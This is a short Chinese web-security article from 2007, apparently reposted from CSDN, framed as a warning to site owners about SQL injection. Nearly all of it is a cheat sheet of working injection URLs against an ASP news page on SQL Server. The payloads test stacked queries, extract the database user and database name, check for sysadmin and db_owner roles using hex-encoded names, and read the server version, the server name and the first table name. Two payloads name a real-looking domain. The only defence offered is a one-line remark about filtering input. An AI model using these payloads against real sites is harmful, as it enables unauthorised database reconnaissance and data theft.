搜索:
首页 >> 网站安全 >> 站长注意SQL 注入一些常用语句

站长注意SQL 注入一些常用语句

2007-10-24 作者:aivii 来源:csdn 投递文章

内容摘要:本文列出了SQL 注入一些常用语句,站长朋友请注意了,看看您的网站程序是否存在这样的漏洞,一般过滤post或get过滤的不安全字符就可以了。 

是否支持多句查询
http://www.xxx.com/shownews.asp?id=51 declare @a int--

是否支持子查询
http://www.xxx.com/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回用户名
http://www.xxx.com/shownews.asp?id=51 And user%2Bchar(124)=0

当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回数据库名
http://www.xxx.com/shownews.asp?id=51 And db_name()%2Bchar(124)=0

操作系统和SQLserver版本
http://www.99568.com/shownews.asp?id=51 And @@version = 1

本地服务器名称
http://www.99568.com/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.xxx.com.cn/Content.asp?NewsID=1077  And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名

Tags:post  get  注入  sql 
相关文章
手机版 网站安全 Asp之家 Aspxhome.com
闽ICP备06017341号